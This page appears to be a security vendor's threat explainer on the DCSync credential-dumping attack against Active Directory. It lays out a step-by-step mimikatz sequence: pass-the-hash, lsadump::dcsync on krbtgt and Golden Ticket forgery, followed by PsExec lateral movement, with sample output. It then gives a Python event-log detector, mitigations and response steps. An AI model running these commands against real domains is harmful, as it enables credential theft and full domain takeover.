DCSync

DCSync is a credential dumping technique that can lead to the compromise of individual user credentials and, more seriously, can serve as a prelude to the creation of a Golden Ticket, since DCSync can be used to compromise the krbtgt account’s password.

To perform a DCSync attack, an adversary must have compromised a user with the Replicating Directory Changes All and Replicating Directory Changes privileges. Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default. It is also possible for any user to be granted these specific privileges. Once obtained, an adversary uses the Directory Replication Service (DRS) Remote Protocol to replicate data (including credentials) from Active Directory.

In addition to domain controllers, some applications – such as Azure Active Directory Connect – have legitimate requirements for replication permissions, but can also become targets for adversaries because of them.

Threat Summary

Target: Active Directory
ATT&CK® Tactic:
ATT&CK Technique:

Difficulty
Detect: Hard
Mitigate: Medium
Respond: Variable

How DCSync Works

Step 1: First, an adversary must compromise an account with the necessary privileges (Replicating Directory Changes All and Replicating Directory Changes) to replicate from Active Directory. The adversary may need to repeat the cycle of internal reconnaissance, lateral movement, and privilege escalation until finding a user with these permissions.

In this example, an attacker is using the hash of a compromised user with the necessary replication permissions to perform a Pass-the-Hash attack to launch a command prompt as the compromised user.

PS> .\mimikatz.exe "privilege::debug" "sekurlsa::msv"
mimikatz # sekurlsa::msv
 
Authentication Id : 0 ; 4018372 (00000000:003d50c4)
Session           : RemoteInteractive from 2
User Name         : PrivUser1
Domain            : Domain
Logon Server      : DC1
Logon Time        : 15/07/2020 20:28:33
SID               : S-1-5-21-5840559-2756745051-1363507867-1105
        msv :
         [00000003] Primary
         * Username : PrivUser1
         * Domain   : Domain
         * NTLM     : eed224b4784bb040aab50b8856fe9f02
         * SHA1     : 42f95dd2a124ceea737c42c06ce7b7cdfbf0ad4b
         * DPAPI    : eb62f5bb2cc136b30a19c1d11b81dc77
 
PS> .\mimikatz.exe "sekurlsa::pth /user:PrivUser1 /ntlm:eed224b4784bb040aab50b8856fe9f02 /domain:domain.com"
 
user    : PrivUser1
domain  : Domain.com
program : cmd.exe
impers. : no
NTLM    : eed224b4784bb040aab50b8856fe9f02
  |  PID  6020
  |  TID  3336
  |  LSA Process is now R/W
  |  LUID 0 ; 14438952 (00000000:00dc5228)
  \_ msv1_0   - data copy @ 0000025C281A86C0 : OK !
  \_ kerberos - data copy @ 0000025C27D08608
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 0000025C287FF6A8 (32) -> null

Step 2: Next, an adversary uses mimikatz (or a similar tool) to replicate credentials from Active Directory. The most common target for replication is the krbtgt account, as this account’s password is a prerequisite for a Golden Ticket.

PS> .\mimikatz.exe "lsadump::dcsync /user:DOMAIN\krbtgt"
 
[DC] 'domain.com' will be the domain
[DC] 'DC1.DOMAIN.com' will be the DC server
[DC] 'DOMAIN\krbtgt' will be the user account
 
Object RDN           : krbtgt
 
** SAM ACCOUNT **
 
SAM Username         : krbtgt
User Principal Name  : krbtgt@DOMAIN.COM
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 09/03/2020 14:51:03
Object Security ID   : S-1-5-21-5840559-2756745051-1363507867-502
Object Relative ID   : 502
 
Credentials:
  Hash NTLM: 1b8cee51fd49e55e8c9c9004a4acc159
 
# ... output truncated ...
 
* Primary:Kerberos-Newer-Keys *
    Default Salt : DOMAIN.COMkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5
      aes128_hmac       (4096) : 471644de05c4834cc6cbc06896210e7d
      des_cbc_md5       (4096) : 23861a94ea83a4cd
 
# ... output truncated ...

Step 3: Lastly, an adversary can use the newly compromised credentials to further their objectives. In this example, possessing the password hash of the krbtgt account enables the attacker to execute a Golden Ticket attack, thereby giving them unfettered access to Active Directory and member computers.

PS> .\mimikatz.exe "kerberos::golden /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /krbtgt:1b8cee51fd49e55e8c9c9004a4acc159 /user:Administrator /id:500 /ptt"
 
User      : Administrator
Domain    : domain.com (DOMAIN)
SID       : S-1-5-21-5840559-2756745051-1363507867
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 1b8cee51fd49e55e8c9c9004a4acc159 - rc4_hmac_nt
Lifetime  : 16/07/2020 13:53:58 ; 14/07/2030 13:53:58 ; 14/07/2030 13:53:58
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'Administrator @ domain.com' successfully submitted for current session
 
PS> PSExec.exe \\fileserver1 powershell.exe
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
 
 
Microsoft Windows [Version 10.0.17763.1339]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32>hostname
fileserver1

Detect, Mitigate, and Respond

Detect

Difficulty: Hard

It is possible to detect a DCSync attack by monitoring network traffic to every domain controller, or by analyzing Windows event logs.

Network monitoring

Monitor network traffic for DRSUAPI RPC requests for the operation DsGetNCChanges and compare the source host against a list of domain controllers. If the source host does not appear on that list, then a DCSync attack is suspected. However, without significant investment in packet analysis it is not possible to determine which objects were replicated.

Windows event logs

Event ID 4662 in the subcategory Audit Directory Service Access audits basic information about users performing operations within Active Directory for events specified in an object’s system access-control list (SACL).

Using this event, it is possible to see when a user exercises their Replicating Directory Changes All extended right by filtering the Properties field for {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}, which is the control access right GUID for that replication right.

However, Active Directory event logs only reveal which objects were replicated when diagnostic logging is enabled. Diagnostic logging can have a performance impact and is not likely to be suitable for long-term production use.
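The event-log check described above, as an added example (not part of the original page): it parses 4662 records in the Windows event XML layout, flags any event whose Properties field carries a replication control access right GUID, and suppresses events from known replicators (domain controller machine accounts and an approved application account such as Azure AD Connect). The sample events, the DC names and the MSOL_placeholder account name are constructed; the second GUID is the well-known one for the companion Replicating Directory Changes right.

```python
import xml.etree.ElementTree as ET
from typing import Optional

# GUIDs of the two replication extended rights: the "All" GUID named in the text and
# the well-known GUID of its companion "Replicating Directory Changes" right.
REPLICATION_RIGHTS = {
    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}": "Replicating Directory Changes All",
    "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}": "Replicating Directory Changes",
}
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

def make_event(user: str, properties: str) -> str:
    """Constructed sample: a minimal 4662 record in the Windows event XML layout."""
    return (
        '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
        "<System><EventID>4662</EventID><Computer>DC1.domain.com</Computer></System>"
        f'<EventData><Data Name="SubjectUserName">{user}</Data>'
        '<Data Name="SubjectDomainName">DOMAIN</Data><Data Name="AccessMask">0x100</Data>'
        f'<Data Name="Properties">{properties}</Data></EventData></Event>'
    )

def check_4662(xml_text: str, expected_replicators: set) -> Optional[dict]:
    """Alert when a replication right is exercised by an account that is not a known
    replicator (a DC machine account or an approved application account)."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "4662":
        return None
    data = {d.get("Name"): (d.text or "") for d in root.iterfind("e:EventData/e:Data", NS)}
    props = data.get("Properties", "").lower()
    rights = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
    if not rights:
        return None  # ordinary directory access, not a replication right
    subject = data.get("SubjectUserName", "")
    if subject.upper() in {a.upper() for a in expected_replicators}:
        return None  # domain controllers (and approved apps) replicate legitimately
    return {"subject": subject, "domain": data.get("SubjectDomainName"), "rights": rights}

def run_sample() -> list:
    """Run the check over three constructed events; only the first should alert."""
    both = "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
    events = [
        make_event("PrivUser1", both),  # a user account exercising replication rights
        make_event("DC2$", both),  # normal DC-to-DC replication
        make_event("PrivUser1", "{00000000-0000-0000-0000-000000000000}"),  # placeholder GUID, not a replication right
    ]
    # Known replicators: DC machine accounts plus an Azure AD Connect account (placeholder name).
    expected = {"DC1$", "DC2$", "MSOL_placeholder"}
    return [a for a in (check_4662(e, expected) for e in events) if a]
```

In production the allowlist should be built from the domain controllers OU and the audited replication permission grants, so that an unexpected grant cannot silently become an expected replicator.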

Mitigate

Difficulty: Hard

Replication amongst Active Directory domain controllers is a normal part of their operation. Mitigating the risk of DCSync involves protecting replication permissions from abuse.

  • Routinely audit replication permission grants and aggressively embrace the principle of least privilege
  • If a legitimate need for replication permissions exists, adopt compensating controls to mitigate the risk of credential theft
  • Alert, in real-time, on changes to replication permissions
  • Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that an adversary can escalate their privileges.

Respond

Difficulty: Medium

Should the use of DCSync be detected, there are several actions one can take to respond immediately. The actions and the response difficulty depend upon what was replicated: if only non-privileged users were replicated, the response difficulty is moderate; if the entire domain or the krbtgt account was replicated, the response is extremely hard.

  • Activate the incident response process and alert the response team
  • Reset the password of the user that performed the unauthorized DCSync and optionally disable the user to a) force instantaneous replication to all domain controllers, and b) disrupt the adversary’s use of that account
  • Quarantine the impacted machines for forensic investigation, as well as eradication and recovery activities
  • Determine which accounts’ credentials were replicated:
    • If only specific users were replicated, reset the passwords for those users
    • If the entire domain or the krbtgt user was replicated, you should activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the krbtgt user.